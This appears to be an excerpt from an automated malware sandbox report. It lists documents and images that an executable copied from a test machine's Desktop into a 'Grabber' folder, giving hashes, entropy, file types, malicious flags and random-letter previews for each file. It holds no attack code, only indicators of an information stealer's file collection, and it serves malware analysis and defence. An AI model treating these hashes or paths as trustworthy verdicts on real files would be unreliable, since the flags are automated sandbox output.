SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\FACWLRWHGG.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697648179966054
Encrypted:	false
SSDEEP:	24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
MD5:	2B743B2063E25195104B0EB24000FB09
SHA1:	4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
SHA-256:	6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
SHA-512:	BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
Malicious:	false
Preview:	FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\AFWAAFRXKO.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	true
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\FACWLRWHGG.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697648179966054
Encrypted:	false
SSDEEP:	24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
MD5:	2B743B2063E25195104B0EB24000FB09
SHA1:	4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
SHA-256:	6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
SHA-512:	BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
Malicious:	true
Preview:	FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\IVHSHTCODI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\PSAMNLJHZW.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\XQACHMZIHU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDSOXXXWOA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697659282858546
Encrypted:	false
SSDEEP:	24:PZQpY9CEILBiF4Pm3eR+sEnNgL6nCW2Y+uaPg9N/v6Q:xz9CEILGCCeR+sCaLKT2TuamVD
MD5:	36FF3A29DF5FCCA14A0FF7431E1C2E9B
SHA1:	C9688881A1A294728BA4A8B5FB2F38DA3267AC07
SHA-256:	DE686B6E22DC89FE172C29EA9221415221F214CD895763E255FCF5AAEE38E240
SHA-512:	0861C1F602EEC19A2F41C7F9C56352DB9497F628B3F2ECDDC7B98B5E24559D7012EF45D020786DF67FAC85F485CD2A25941EA894681A6B42D9A6ABFC4B9C95CB
Malicious:	false
Preview:	JDSOXXXWOAHUSVGOCZZUNHSINJUSJQGESAHVTHZWADMWVUHKNKEYECCVOPSPXQMMRTJEEDOFPBKWQBWEDEAWUPPRVCRNLZAVBLNCWBMIYVZJGZUPTHGFKCXKWLTQCZQPVRXBIAVKYLTFXPKNHVWYMOUBOZQSCFNHTCTVVDHABNRSEIRXPGUVHPJRXHDVQOUZEXTQARFRICYOSUBNKEVGHZNSQHPCONVPIVIZKOKBTGHMBCORJUHRCVHLLLCXNSHKGVDKTVXUYWRZZWPFJNOSQIOTEJVJWRKTCWXZJKSTIXEMRZVNIBTWRTYOGNKENDSOGEUFCZHZYBWICCKXGXWKGNSNLJGLSDGHUWALHDWVZRYHCQNPZEFTPXYOSUVIOMEZVNNCZURCXELWTINXUKBZTOMRGIVZNMMHUVBKLGFRKYWMYSEIOMJGQGNNWXSIPRRGCYJLZPQIGVVRGGIWSBFJWNMIHYBTTNYTHUBYODAVVOMBAPZKYFUHGDXYMJBKYURCWOJWNGJWFWIHOYYRBYQMJCLIOPHRDDBMRPUMPYCXXGTMYQECUGCCJYKESOBMCTEIFVVICNMXJDGTYESOWLJHWFEFKDEKUKKLKISTLOTKRYLMZDQERBBALFYUEZMKPDBKAGGQHIKIECDSAGIELZVVCNSIPWEXNQLIRNXWGBYHVMXQAPKLQOTFHYKEIQETFBRRPRYPISBRTYMGEIXTCRSLOVMLKWKAUALATKYYNFIRASLERFJZYJWJDEUVJNQIHTSIBZHXWHXSSQNFOSWYDTKNMLOFKDOECKGKVBAKPFZRKCBMCDGLAABGWBCFMKGJUBIHBWBARNAHHTZKNZZPZAUEJJQIUMHCASBJGILUQKBBCSIQMEOUZCFGTXLDYKUHXCHFZHMBCWHRIOVRKXVQUVLMUKYQZQFGGFYGKWBAJJKGZINILPXFMXXMEKMODDVNAMUZNNTJCUURPRTMODGGFBSVRAIMVMRSDSSUQTQRZMVO

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDSOXXXWOA\IVHSHTCODI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
